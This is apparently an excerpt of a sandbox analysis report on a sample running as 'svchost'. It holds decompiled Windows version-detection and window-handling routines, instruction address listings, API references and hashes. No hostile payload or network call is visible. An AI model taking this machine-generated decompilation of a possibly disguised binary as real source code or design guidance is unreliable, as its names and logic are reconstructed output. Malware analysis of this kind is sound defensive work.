    								if( *((char*)(_t851 + 0x27a)) != 1) {
    									E00483652(_t847 + 8, "Windows Server 2008");
    									E004833FF(_t847 + 0x10, "Windows Server 2008");
    									 *(_t847 + 4) = 0xa;
    								} else {
    									E00483652(_t847 + 8, "Windows Vista");
    									E004833FF(_t847 + 0x10, "Windows Vista");
    									 *(_t847 + 4) = 9;
    								}
    								goto L23;
    							}
    						}
    						if( *(_t851 + 0x1e8) != 0) {
    							L10:
    							if( *(_t851 + 0x1e8) != 1) {
    								L12:
    								if( *(_t851 + 0x1e8) != 2) {
    									goto L37;
    								} else {
    									E00483652(_t847 + 8, "Microsoft Windows 2003 ");
    									 *(_t847 + 4) = 8;
    									goto L14;
    								}
    							}
    							E00483652(_t847 + 8, "Microsoft Windows XP ");
    							 *(_t847 + 4) = 7;
    							if( *((intOrPtr*)(_t851 + 0x1e4)) != 5) {
    								goto L14;
    							}
    							goto L12;
    						}
    						E00483652(_t847 + 8, "Microsoft Windows 2000 ");
    						 *(_t847 + 4) = 6;
    						if( *((intOrPtr*)(_t851 + 0x1e4)) != 5) {
    							goto L14;
    						}
    						goto L10;
    					}
    				}
    				 *(_t851 + 0x1e0) = 0x94;
    				_t443 = GetVersionExA(_t851 + 0x1e0);
    				if(_t443 == 0) {
    					goto L166;
    				}
    				goto L2;
    			}
    [Instruction address column for the decompiled code above, spilled out of the report's side-by-side layout; addresses run from 0x00468e90 to 0x0046a1d0, with 0x00000000 entries for lines that carry no address.]
    0x00469e1c
    0x00469e00
    0x00000000
    0x00469e00
    0x00469bca
    0x00469bce
    0x00469bd3
    0x00469bd4
    0x00469bd9
    0x00469bdd
    0x00469be0
    0x00469be2
    0x00469be5
    0x00469be7
    0x00469be9
    0x00469beb
    0x00469bef
    0x00469bf1
    0x00469bf3
    0x00469bf5
    0x00469bf8
    0x00469bfa
    0x00469bfc
    0x00469bfd
    0x00469c00
    0x00469c00
    0x00469c00
    0x00469c02
    0x00469c04
    0x00469c0b
    0x00469c0f
    0x00469c0f
    0x00469c0f
    0x00469c11
    0x00469c1a
    0x00469c1c
    0x00469c25
    0x00469c2c
    0x00469c36
    0x00469c38
    0x00469c41
    0x00469c48
    0x00469c52
    0x00469c54
    0x00469c5d
    0x00469c64
    0x00469c6e
    0x00469c70
    0x00469cb1
    0x00469cb1
    0x00469cb8
    0x00469cc2
    0x00469cc4
    0x00469ccd
    0x00469cd4
    0x00469cd9
    0x00469cde
    0x00469ce0
    0x00469d21
    0x00469d21
    0x00469d28
    0x00469d2c
    0x00469d2d
    0x00469d32
    0x00469d34
    0x00469d75
    0x00469d75
    0x00469d7c
    0x00469d80
    0x00469d81
    0x00469d86
    0x00469d88
    0x00000000
    0x00000000
    0x00000000
    0x00469d8e
    0x00469d36
    0x00469d36
    0x00469d3a
    0x00469d3f
    0x00469d40
    0x00469d45
    0x00469d49
    0x00469d4c
    0x00469d4e
    0x00469d51
    0x00469d53
    0x00469d55
    0x00469d57
    0x00469d5b
    0x00469d5d
    0x00469d5f
    0x00469d61
    0x00469d64
    0x00469d66
    0x00469d68
    0x00469d69
    0x00469d6c
    0x00469d6c
    0x00469d6c
    0x00469d6e
    0x00469d70
    0x00469d70
    0x00469d73
    0x00469d73
    0x00469d73
    0x00000000
    0x00469d73
    0x00469ce2
    0x00469ce7
    0x00469ce7
    0x00469ceb
    0x00469cec
    0x00469cf1
    0x00469cf5
    0x00469cf8
    0x00469cfa
    0x00469cfd
    0x00469cff
    0x00469d01
    0x00469d03
    0x00469d07
    0x00469d09
    0x00469d0b
    0x00469d0d
    0x00469d10
    0x00469d12
    0x00469d14
    0x00469d15
    0x00469d18
    0x00469d18
    0x00469d18
    0x00469d1a
    0x00469d1c
    0x00469d1c
    0x00469d1f
    0x00469d1f
    0x00469d1f
    0x00000000
    0x00469d1f
    0x00469cc6
    0x00000000
    0x00469cc6
    0x00469c72
    0x00469c77
    0x00469c77
    0x00469c7b
    0x00469c7c
    0x00469c81
    0x00469c85
    0x00469c88
    0x00469c8a
    0x00469c8d
    0x00469c8f
    0x00469c91
    0x00469c93
    0x00469c97
    0x00469c99
    0x00469c9b
    0x00469c9d
    0x00469ca0
    0x00469ca2
    0x00469ca4
    0x00469ca5
    0x00469ca8
    0x00469ca8
    0x00469ca8
    0x00469caa
    0x00469cac
    0x00469cac
    0x00469caf
    0x00469caf
    0x00469caf
    0x00000000
    0x00469caf
    0x00469c56
    0x00000000
    0x00469c56
    0x00469c3a
    0x00000000
    0x00469c3a
    0x00469c1e
    0x00000000
    0x00469c1e
    0x00469a58
    0x00469a5c
    0x00469a61
    0x00469a62
    0x00469a67
    0x00469a6b
    0x00469a6e
    0x00469a70
    0x00469a73
    0x00469a75
    0x00469a77
    0x00469a79
    0x00469a7d
    0x00469a7f
    0x00469a81
    0x00469a83
    0x00469a86
    0x00469a88
    0x00469a8a
    0x00469a8b
    0x00469a8e
    0x00469a8e
    0x00469a8e
    0x00469a90
    0x00469a92
    0x00469a99
    0x00469a9d
    0x00469a9d
    0x00469a9d
    0x00469a9f
    0x00469aa8
    0x00469aaa
    0x00469ab3
    0x00469aba
    0x00469ac4
    0x00469ac6
    0x00469acf
    0x00469ad6
    0x00469ae0
    0x00469ae2
    0x00469b23
    0x00469b23
    0x00469b2a
    0x00469b34
    0x00469b36
    0x00469b3f
    0x00469b46
    0x00469b4b
    0x00469b50
    0x00469b52
    0x00469b93
    0x00469b93
    0x00469b9a
    0x00469b9e
    0x00469b9f
    0x00469ba4
    0x00469ba6
    0x00000000
    0x00000000
    0x00000000
    0x00469bac
    0x00469b54
    0x00469b59
    0x00469b59
    0x00469b5d
    0x00469b5e
    0x00469b63
    0x00469b67
    0x00469b6a
    0x00469b6c
    0x00469b6f
    0x00469b71
    0x00469b73
    0x00469b75
    0x00469b79
    0x00469b7b
    0x00469b7d
    0x00469b7f
    0x00469b82
    0x00469b84
    0x00469b86
    0x00469b87
    0x00469b8a
    0x00469b8a
    0x00469b8a
    0x00469b8c
    0x00469b8e
    0x00469b8e
    0x00469b91
    0x00469b91
    0x00469b91
    0x00000000
    0x00469b91
    0x00469b38
    0x00000000
    0x00469b38
    0x00469ae4
    0x00469ae9
    0x00469ae9
    0x00469aed
    0x00469aee
    0x00469af3
    0x00469af7
    0x00469afa
    0x00469afc
    0x00469aff
    0x00469b01
    0x00469b03
    0x00469b05
    0x00469b09
    0x00469b0b
    0x00469b0d
    0x00469b0f
    0x00469b12
    0x00469b14
    0x00469b16
    0x00469b17
    0x00469b1a
    0x00469b1a
    0x00469b1a
    0x00469b1c
    0x00469b1e
    0x00469b1e
    0x00469b21
    0x00469b21
    0x00469b21
    0x00000000
    0x00469b21
    0x00469ac8
    0x00000000
    0x00469ac8
    0x00469aac
    0x00000000
    0x00469aac
    0x00469916
    0x0046991a
    0x0046991f
    0x00469920
    0x00469925
    0x00469929
    0x0046992c
    0x0046992e
    0x00469931
    0x00469933
    0x00469935
    0x00469937
    0x0046993b
    0x0046993d
    0x0046993f
    0x00469941
    0x00469944
    0x00469946
    0x00469948
    0x00469949
    0x0046994c
    0x0046994c
    0x0046994c
    0x0046994e
    0x00469950
    0x00469957
    0x0046995b
    0x0046995b
    0x0046995b
    0x0046995d
    0x00469966
    0x00469968
    0x00469971
    0x00469978
    0x00469982
    0x00469984
    0x0046998d
    0x00469994
    0x0046999e
    0x004699a0
    0x004699a9
    0x004699b0
    0x004699ba
    0x004699bc
    0x004699fd
    0x004699fd
    0x00469a04
    0x00469a0e
    0x00469a10
    0x00469a1c
    0x00469a23
    0x00469a28
    0x00469a2d
    0x00469a2f
    0x00000000
    0x00000000
    0x00469a35
    0x00000000
    0x00469a35
    0x00469a12
    0x00000000
    0x00469a12
    0x004699be
    0x004699c3
    0x004699c3
    0x004699c7
    0x004699c8
    0x004699cd
    0x004699d1
    0x004699d4
    0x004699d6
    0x004699d9
    0x004699db
    0x004699dd
    0x004699df
    0x004699e3
    0x004699e5
    0x004699e7
    0x004699e9
    0x004699ec
    0x004699ee
    0x004699f0
    0x004699f1
    0x004699f4
    0x004699f4
    0x004699f4
    0x004699f6
    0x004699f8
    0x004699f8
    0x004699fb
    0x004699fb
    0x004699fb
    0x00000000
    0x004699fb
    0x004699a2
    0x00000000
    0x004699a2
    0x00469986
    0x00000000
    0x00469986
    0x0046996a
    0x00000000
    0x00000000
    0x004697c0
    0x004697c4
    0x004697c9
    0x004698bf
    0x004698bf
    0x004698cd
    0x004698d0
    0x004698d2
    0x004698da
    0x004698dc
    0x004698e3
    0x004698e8
    0x004698eb
    0x004698f6
    0x004698f6
    0x00000000
    0x00000000
    0x0046979b
    0x00468f12
    0x00468f13
    0x00469666
    0x0046966e
    0x00000000
    0x00000000
    0x00469674
    0x0046967b
    0x004696c1
    0x004696c1
    0x004696c9
    0x00469703
    0x00469703
    0x0046970b
    0x00469715
    0x0046971a
    0x0046971a
    0x00000000
    0x0046970b
    0x004696cb
    0x004696d5
    0x004696da
    0x004696e2
    0x004696eb
    0x004696eb
    0x004696f7
    0x004696fe
    0x00469701
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00469701
    0x0046967d
    0x00469687
    0x0046968c
    0x00469693
    0x00469695
    0x004696a1
    0x004696a6
    0x00469697
    0x00469697
    0x00469697
    0x004696ad
    0x004696b9
    0x004696bc
    0x004696bf
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004696bf
    0x00468f1a
    0x00000000
    0x00468f20
    0x00468f28
    0x00468f32
    0x00468f32
    0x00468f4b
    0x00468fbe
    0x00468fc6
    0x0046907a
    0x00469082
    0x0046933b
    0x0046933b
    0x00469346
    0x0046934d
    0x00469358
    0x00469360
    0x00469366
    0x0046936d
    0x00469386
    0x00469386
    0x00469389
    0x00469390
    0x00469397
    0x0046939f
    0x004693a6
    0x004693a8
    0x004693ad
    0x004693b0
    0x004693b2
    0x004693b5
    0x004693b8
    0x004693ba
    0x004693ba
    0x004693bc
    0x004693bd
    0x004693bd
    0x004693c9
    0x004693d0
    0x004693dd
    0x004693e4
    0x004693e9
    0x004693f3
    0x004693f8
    0x004693f8
    0x004693fb
    0x004693fe
    0x00469400
    0x00469400
    0x00469401
    0x00469401
    0x00469408
    0x00469411
    0x00469424
    0x00469439
    0x00469440
    0x00469448
    0x00469466
    0x0046946e
    0x00469479
    0x00469480
    0x00469487
    0x0046948e
    0x00469495
    0x0046949c
    0x004694ad
    0x004694b4
    0x004694bb
    0x004694c2
    0x004694cd
    0x004694d8
    0x004694e6
    0x004694ef
    0x004694f8
    0x00469501
    0x0046950a
    0x00469513
    0x00469516
    0x00469544
    0x00469568
    0x0046956d
    0x00469573
    0x00469586
    0x0046958d
    0x00469594
    0x0046959f
    0x004695a6
    0x004695ad
    0x004695af
    0x004695bb
    0x004695c0
    0x004695c0
    0x004695ca
    0x004695d4
    0x004695d6
    0x004695dd
    0x004695e4
    0x004695ef
    0x004695f5
    0x004695fa
    0x004695fd
    0x004695ff
    0x00469601
    0x00469604
    0x00469606
    0x00469606
    0x00469607
    0x00469607
    0x00469604
    0x00469613
    0x00469617
    0x00469619
    0x0046961e
    0x00469620
    0x00469628
    0x00469628
    0x00469620
    0x00469631
    0x0046963f
    0x00469651
    0x0046965c
    0x00469088
    0x00469088
    0x00469093
    0x0046909a
    0x004690a5
    0x004690ad
    0x004690b3
    0x004690ba
    0x004690d3
    0x004690d3
    0x004690d6
    0x004690dd
    0x004690e4
    0x004690ec
    0x004690f3
    0x004690f5
    0x004690fd
    0x004690ff
    0x00469102
    0x00469105
    0x00469107
    0x00469107
    0x00469109
    0x0046910a
    0x0046910a
    0x00469116
    0x00469121
    0x0046912e
    0x00469135
    0x00469140
    0x00469149
    0x00469155
    0x0046915d
    0x00469168
    0x0046917d
    0x00469185
    0x0046918c
    0x0046919d
    0x004691a0
    0x004691ed
    0x0046923a
    0x0046923f
    0x00469245
    0x0046924a
    0x00469254
    0x0046925f
    0x00469262
    0x00469264
    0x0046926c
    0x0046926e
    0x0046926e
    0x0046926c
    0x00469256
    0x00469256
    0x00469256
    0x00469283
    0x0046928a
    0x00469298
    0x004692a5
    0x004692ac
    0x004692b8
    0x004692bd
    0x004692bd
    0x004692c7
    0x004692d1
    0x004692dc
    0x004692ec
    0x004692ee
    0x004692f5
    0x004692fd
    0x004692fd
    0x004692f5
    0x00469306
    0x00469314
    0x00469326
    0x00469331
    0x00469331
    0x00000000
    0x00469082
    0x00468fcc
    0x00468fd5
    0x00469023
    0x00469026
    0x00000000
    0x0046902c
    0x0046902c
    0x00469034
    0x00469061
    0x0046906e
    0x00469073
    0x00469036
    0x0046903e
    0x0046904b
    0x00469050
    0x00469050
    0x00000000
    0x00469034
    0x00468fd7
    0x00468fdf
    0x00469008
    0x00469015
    0x0046901a
    0x00468fe1
    0x00468fe9
    0x00468ff6
    0x00468ffb
    0x00468ffb
    0x00000000
    0x00468fdf
    0x00468fd5
    0x00468f54
    0x00468f76
    0x00468f7e
    0x00468f9c
    0x00468fa4
    0x00000000
    0x00468faa
    0x00468fb2
    0x00468fb7
    0x00000000
    0x00468fb7
    0x00468fa4
    0x00468f88
    0x00468f94
    0x00468f9a
    0x00000000
    0x00000000
    0x00000000
    0x00468f9a
    0x00468f5e
    0x00468f6a
    0x00468f74
    0x00000000
    0x00000000
    0x00000000
    0x00468f74
    0x00468f1a
    0x00468eed
    0x00468ef9
    0x00468efd
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetVersionExA.KERNEL32 ref: 00468EE0
    • GetVersionExA.KERNEL32(?), ref: 00468EF9
      • Part of subcall function 0047FDAB: __EH_prolog.LIBCMT ref: 0047FDB0
      • Part of subcall function 004804CA: RtlEnterCriticalSection.NTDLL(004E1B90), ref: 0048053C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Version$CriticalEnterH_prologSection
    • String ID: $ $ $ (Build $ Advanced Server$ BackOffice Small Business Edition$ Backup Domain Controller$ Datacenter$ Domain Controller$ Enterprise$ Personal$ Primary Domain Controller$ Professional$ Server$ Terminal Services$ Workstation$%02d$%d.$A$DOS$Failed in call to GetOSVersion$Microsoft Win32s $Microsoft Windows 2000 $Microsoft Windows 2003 $Microsoft Windows 95 $Microsoft Windows 98 $Microsoft Windows Me $Microsoft Windows NT $Microsoft Windows XP $OSR2 $SE $Service Pack %d$Unknown OS$Windows$Windows 2000$Windows 2003$Windows 7$Windows 95$Windows 95 OSR2$Windows 95 SP1$Windows 98$Windows 98 SP1$Windows 98 Second Edition$Windows ??$Windows CE$Windows Millenium Edition$Windows NT$Windows Server 2008$Windows Server 2008 R2$Windows Vista$Windows XP$Z$unknown$version
    • API String ID: 2295131389-483160897
    • Opcode ID: 95cc3abe9b61459900399e3f39164f1cdd3831e309504a54c600cbe889259cce
    • Instruction ID: 1496540494da85ad3aade5008464665070f51dbc7b71165d6175166d2af594d3
    • Opcode Fuzzy Hash: 95cc3abe9b61459900399e3f39164f1cdd3831e309504a54c600cbe889259cce
    • Instruction Fuzzy Hash: 30B2A2701043459BCB24DE61C891AEFB7D8BB94314F104E2FA59A572C1FFB89A09CB5B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00416460(void* __eflags) {
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t286;
    				void* _t287;
    				struct HWND__* _t289;
    				intOrPtr _t292;
    				void* _t294;
    				unsigned int _t302;
    				struct HACCEL__* _t311;
    				struct HMENU__* _t316;
    				struct HMENU__* _t323;
    				struct HMENU__* _t325;
    				struct HMENU__* _t329;
    				struct HMENU__* _t333;
    				struct HWND__* _t334;
    				struct HMENU__* _t336;
    				struct HMENU__* _t338;
    				void* _t340;
    				struct HMENU__* _t341;
    				struct HMENU__* _t345;
    				signed int _t346;
    				void* _t349;
    				struct HMENU__* _t350;
    				struct HMENU__* _t353;
    				struct HMENU__* _t362;
    				struct HMENU__* _t364;
    				void* _t366;
    				struct HMENU__* _t368;
    				void* _t370;
    				void* _t372;
    				void* _t375;
    				struct HMENU__* _t376;
    				int _t377;
    				void* _t378;
    				void* _t380;
    				int* _t386;
    				void* _t387;
    				struct HMENU__* _t388;
    				struct HMENU__* _t391;
    				void* _t393;
    				void* _t401;
    				struct HMENU__* _t402;
    				struct HWND__* _t403;
    				int* _t408;
    				struct HMENU__* _t409;
    				struct HMENU__* _t410;
    				void* _t412;
    				signed int _t413;
    				struct HACCEL__* _t418;
    				struct HMENU__* _t419;
    				struct HMENU__* _t427;
    				struct HMENU__* _t428;
    				void* _t430;
    				void* _t437;
    				struct HMENU__* _t444;
    				struct HACCEL__* _t445;
    				struct HMENU__* _t446;
    				signed int _t454;
    				struct HACCEL__* _t459;
    				struct HWND__* _t463;
    				struct HMENU__* _t464;
    				struct HMENU__* _t469;
    				struct HMENU__* _t470;
    				void* _t472;
    				int _t476;
    				struct HMENU__* _t483;
    				signed int _t484;
    				struct HMENU__* _t486;
    				int* _t487;
    				struct HMENU__* _t488;
    				struct HMENU__* _t490;
    				struct HWND__* _t491;
    				struct HMENU__* _t493;
    				intOrPtr* _t495;
    				void* _t496;
    				void* _t497;
    				signed int _t498;
    				signed int _t499;
    				struct HMENU__* _t500;
    				signed int _t501;
    				struct HMENU__* _t502;
    				struct HMENU__* _t503;
    				signed int _t575;
    				signed char _t576;
    				struct HMENU__* _t613;
    				signed int _t616;
    				struct HMENU__* _t617;
    				intOrPtr _t623;
    				unsigned int _t633;
    				signed int _t636;
    				struct HMENU__* _t637;
    				struct HMENU__* _t638;
    				struct HMENU__* _t639;
    				intOrPtr _t640;
    				void* _t641;
    				void* _t642;
    				void* _t643;
    				intOrPtr _t645;
    				void* _t647;
    				void* _t648;
    				intOrPtr _t650;
    				void* _t651;
    				void* _t652;
    				void* _t653;
    				intOrPtr _t655;
    				void* _t656;
    				void* _t657;
    				void* _t658;
    				void* _t659;
    				int* _t660;
    				void* _t661;
    				void* _t662;
    				void* _t663;
    				void* _t664;
    				void* _t665;
    				void* _t666;
    				void* _t667;
    				void* _t668;
    				struct HMENU__* _t670;
    				struct HMENU__* _t674;
    				struct HACCEL__* _t676;
    				signed int _t678;
    				struct HMENU__* _t680;
    				struct HMENU__* _t681;
    				unsigned int _t682;
    				intOrPtr _t683;
    				struct HWND__* _t685;
    				int* _t686;
    				struct HMENU__* _t687;
    				int* _t688;
    				void* _t689;
    				void* _t690;
    				struct HMENU__** _t691;
    				struct HMENU__** _t693;
    				void* _t695;
    				void* _t696;
    				intOrPtr _t697;
    				intOrPtr* _t698;
    				signed int* _t699;
    				void* _t700;
    				struct HMENU__* _t702;
    				void* _t703;
    				void* _t704;
    				intOrPtr _t706;
    				void* _t708;
    				int _t709;
    				signed int _t710;
    				intOrPtr _t713;
    				struct HMENU__* _t714;
    				intOrPtr* _t715;
    				struct HMENU__* _t717;
    				void* _t719;
    				void* _t720;
    
    				_t676 = 0;
    				 *((intOrPtr*)(_t719 + 0x38)) = 0x64;
    				 *(_t719 + 0x24) = 0;
    				_t286 = E00418A40(0x3e9, 0, 0);
    				_t707 = _t286;
    				_t483 =  *(_t719 + 0xec);
    				 *((intOrPtr*)(_t719 + 0x58)) = _t286;
    				_t633 = _t483 + 0x14;
    				_t504 = _t633;
    				 *(_t719 + 0x1c) = _t633;
    				_t287 = E004135B0(_t633, 0, 0);
    				if(_t287 == 0) {
    					L57:
    					__eflags = 0;
    					return 0;
    				} else {
    					if( *(_t719 + 0xec) != 0) {
    						L7:
    						if( *((intOrPtr*)(_t719 + 0xf4)) != 1) {
    							_t289 =  *(_t719 + 0xf8);
    							__eflags = _t289 - _t676;
    							if(_t289 == _t676) {
    								goto L14;
    							} else {
    								_t470 = IsWindow(_t289);
    								__eflags = _t470;
    								if(_t470 == 0) {
    									goto L57;
    								} else {
    									goto L14;
    								}
    							}
    						} else {
    							 *(_t719 + 0xf8) = _t676;
    							L14:
    							E00418A40(0x7d9, _t676, _t676);
    							 *(_t719 + 0x24) = _t483 + 0x34;
    							E00413540(_t483 + 0x34, _t676, _t633);
    							_t292 = E00413A20(_t707, _t483);
    							 *((intOrPtr*)(_t719 + 0x4c)) = _t292;
    							if(_t292 == _t676) {
    								goto L57;
    							} else {
    								 *(_t719 + 0xa0) = _t676;
    								 *(_t719 + 0x14) = _t676;
    								_t294 = E00414080(_t633, _t719 + 0xb4);
    								 *(_t719 + 0x28) = _t676;
    								if(_t294 > _t676) {
    									_push(_t676);
    									_push(_t719 + 0x28);
    									_push(_t676);
    									_push(0xffffffff);
    									_push(_t294);
    									_push(E004135B0(_t633,  *((intOrPtr*)(_t719 + 0xb4)), _t676));
    									_t469 = E00422FA0();
    									_t719 = _t719 + 0x18;
    									 *(_t719 + 0x10) = _t469;
    								}
    								E0040B5D0(_t719 + 0x54);
    								 *((intOrPtr*)(_t719 + 0x54)) = 0x495ea0;
    								E0040B5D0(_t719 + 0x7c);
    								 *((intOrPtr*)(_t719 + 0x7c)) = 0x495ea0;
    								E0040B5D0(_t719 + 0x68);
    								 *((intOrPtr*)(_t719 + 0x68)) = 0x495ea0;
    								E0040B5D0(_t719 + 0x34);
    								_t678 =  *(_t483 + 0x18);
    								_t484 = _t678;
    								 *(_t719 + 0x30) = _t678;
    								 *(_t719 + 0x1c) = _t484;
    								if(_t678 <= 0) {
    									L42:
    									asm("sbb eax, eax");
    									 *(_t719 + 0x48) =  ~( *(_t719 + 0x78)) &  *(_t719 + 0x70);
    									_t302 =  *(_t719 + 0x64);
    									asm("sbb edi, edi");
    									_t680 =  *(_t719 + 0x14);
    									_t636 =  ~_t302 &  *(_t719 + 0x5c);
    									asm("sbb ecx, ecx");
    									_t486 = 1;
    									 *(_t719 + 0x20) =  ~( *(_t719 + 0x8c)) &  *(_t719 + 0x84);
    									asm("sbb ecx, ecx");
    									 *(_t719 + 0x10) = 1;
    									 *(_t719 + 0x24) =  ~( *(_t719 + 0x44)) &  *(_t719 + 0x3c);
    									 *(_t719 + 0x1c) = _t302 >> 2;
    									while(1) {
    										_t708 = E004135B0(_t680, _t486, 0);
    										if(_t708 == 0) {
    											break;
    										}
    										if(E00413C90(_t680, _t486) != 1) {
    											_t498 = E0040C0B0(_t636,  *(_t719 + 0x20), E00413600( *(_t719 + 0x14),  *(_t719 + 0x10)));
    											_t155 = _t708 + 0x18; // 0x18
    											_t689 = _t155;
    											 *(_t719 + 0x40) = ( *(_t719 + 0x2c))[_t498];
    											_t690 = _t689 + E0040C020( *(_t719 + 0x20), _t689);
    											_t401 = E0040C020( *(_t719 + 0x20), _t690);
    											_t160 = _t690 + 0x18; // 0x18
    											_t691 = _t401 + _t160;
    											_t719 = _t719 + 0x14;
    											_t402 =  *_t691;
    											__eflags = _t402;
    											if(_t402 == 0) {
    												_t403 =  *(_t719 + 0x18);
    											} else {
    												_t413 = E0040C0B0(_t636,  *(_t719 + 0x1c), _t402);
    												_t617 =  *(_t719 + 0x2c);
    												_t719 = _t719 + 0xc;
    												_t403 = _t617[_t413];
    											}
    											__eflags = _t403;
    											if(_t403 != 0) {
    												_t403 =  *(_t403 + 0x1c);
    											}
    											E00484C84(_t708, SetParent( *( *((intOrPtr*)(_t719 + 0x34)) + 0x1c), _t403));
    											_t616 =  *(_t719 + 0x48);
    											__eflags =  *(_t616 + _t498 * 4);
    											if( *(_t616 + _t498 * 4) != 0) {
    												_t409 = _t691[1];
    												_t693 =  &(_t691[2]);
    												__eflags = _t409;
    												if(_t409 > 0) {
    													while(1) {
    														__eflags =  *_t693;
    														if( *_t693 == 0) {
    															break;
    														}
    														_t409 = _t409 - 1;
    														_t693 =  &(_t693[1]);
    														__eflags = _t409;
    														if(_t409 > 0) {
    															continue;
    														} else {
    														}
    														goto L78;
    													}
    													__eflags = _t409;
    													if(_t409 > 0) {
    														_t499 =  *(_t719 + 0x24);
    														_t714 = _t409;
    														do {
    															_t410 =  *_t693;
    															__eflags = _t410;
    															if(_t410 != 0) {
    																_t412 = E0040C0B0(_t636,  *(_t719 + 0x20), _t410);
    																_t719 = _t719 + 0xc;
    																 *((char*)(_t412 + _t499)) = 0;
    															}
    															_t693 =  &(_t693[1]);
    															_t714 = _t714 - 1;
    															__eflags = _t714;
    														} while (_t714 != 0);
    													}
    												}
    											}
    											L78:
    											_t680 =  *(_t719 + 0x14);
    											_t408 =  &( *(_t719 + 0x10)->i);
    											 *(_t719 + 0x10) = _t408;
    											_t486 = _t408;
    										} else {
    											_t486 =  &(_t486->i);
    											 *(_t719 + 0x10) = _t486;
    										}
    										continue;
    										while(1) {
    											L80:
    											 *(_t719 + 0x10) = _t487;
    											while(1) {
    												_t637 = E004135B0(_t680, _t487, 0);
    												__eflags = _t637;
    												if(_t637 == 0) {
    													break;
    												}
    												_t551 = _t680;
    												_t378 = E00413C90(_t680, _t487);
    												__eflags = _t378 - 1;
    												if(_t378 != 1) {
    													_t661 = _t637 + 0x18;
    													_t662 = _t661 + E0040C020(_t551, _t661);
    													_t380 = E0040C020(_t551, _t662);
    													_t613 =  *(_t719 + 0x18);
    													_t713 =  *((intOrPtr*)(_t380 + _t662 + 0x18));
    													_t719 = _t719 + 8;
    													__eflags = _t613 - 2;
    													 *(_t719 + 0x2c) =  *(_t380 + _t662);
    													_t185 = _t613 - 1; // -1
    													_t497 = _t185;
    													if(_t613 < 2) {
    														L88:
    														SetWindowPos( *( *(_t719 + 0x2c) + 0x1c), 0, 0, 0, 0, 0, 0x13);
    														goto L89;
    													} else {
    														do {
    															_t387 = E004135B0(_t680, _t497, 0);
    															_t555 = _t680;
    															_t663 = _t387;
    															_t388 = E00413C90(_t680, _t497);
    															__eflags = _t388;
    															if(_t388 != 0) {
    																goto L87;
    															} else {
    																_t664 = _t663 + 0x18;
    																_t665 = _t664 + E0040C020(_t555, _t664);
    																_t666 = _t665 + E0040C020(_t555, _t665);
    																_t719 = _t719 + 8;
    																__eflags =  *((intOrPtr*)(_t666 + 0x18)) - _t713;
    																if( *((intOrPtr*)(_t666 + 0x18)) == _t713) {
    																	__eflags = _t497 - 1;
    																	if(_t497 < 1) {
    																		goto L88;
    																	} else {
    																		_t556 = _t680;
    																		_t391 = E004135B0(_t680, _t497, 0);
    																		__eflags = _t391;
    																		if(_t391 != 0) {
    																			_t191 = _t391 + 0x18; // 0x18
    																			_t667 = _t191;
    																			_t668 = _t667 + E0040C020(_t556, _t667);
    																			_t393 = E0040C020(_t556, _t668);
    																			_t719 = _t719 + 8;
    																			_t670 =  *(_t668 + _t393);
    																			__eflags = _t670;
    																			if(_t670 != 0) {
    																				SetWindowPos( *( *(_t719 + 0x2c) + 0x1c),  *(_t670 + 0x1c), 0, 0, 0, 0, 0x13);
    																				L89:
    																			}
    																		}
    																		goto L90;
    																	}
    																	L101:
    																	_t490 =  *((intOrPtr*)( *(_t719 + 0xe8) + 0x18)) - 1;
    																	__eflags = _t490;
    																	if(_t490 < 0) {
    																		_t709 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t688 =  &(_t490->i);
    																		_t709 = 0;
    																		__eflags = 0;
    																		while(1) {
    																			_t362 = _t490;
    																			_t490 = _t490 - 1;
    																			_t688 = _t688 - 1;
    																			_t651 = E004135B0( *(_t719 + 0x14), _t362, _t709);
    																			__eflags = _t651 - _t709;
    																			if(_t651 == _t709) {
    																				goto L111;
    																			}
    																			_t547 =  *(_t719 + 0x14);
    																			_t364 = E00413C90( *(_t719 + 0x14), _t688);
    																			__eflags = _t364;
    																			if(_t364 == 0) {
    																				_t652 = _t651 + 0x18;
    																				_t653 = _t652 + E0040C020(_t547, _t652);
    																				_t366 = E0040C020(_t547, _t653);
    																				_t719 = _t719 + 8;
    																				_t655 =  *((intOrPtr*)(_t653 + _t366));
    																				__eflags = _t655 - _t709;
    																				if(_t655 != _t709) {
    																					_t368 = IsWindow( *(_t655 + 0x1c));
    																					__eflags = _t368;
    																					if(_t368 != 0) {
    																						SendMessageA( *(_t655 + 0x1c), 0x806f, _t709, _t709);
    																					}
    																				}
    																			}
    																			__eflags = _t490 - _t709;
    																			if(_t490 >= _t709) {
    																				continue;
    																			} else {
    																			}
    																			goto L111;
    																		}
    																	}
    																	L111:
    																	SendMessageA( *( *(_t719 + 0x18) + 0x1c), 0x8004, _t709, _t709);
    																	_t639 = 1;
    																	_t682 =  *(_t719 + 0x1c);
    																	__eflags = _t682 - 1;
    																	if(_t682 > 1) {
    																		_t710 =  *(_t719 + 0x24);
    																		_t495 =  *(_t719 + 0x20) + 4;
    																		do {
    																			asm("sbb edx, edx");
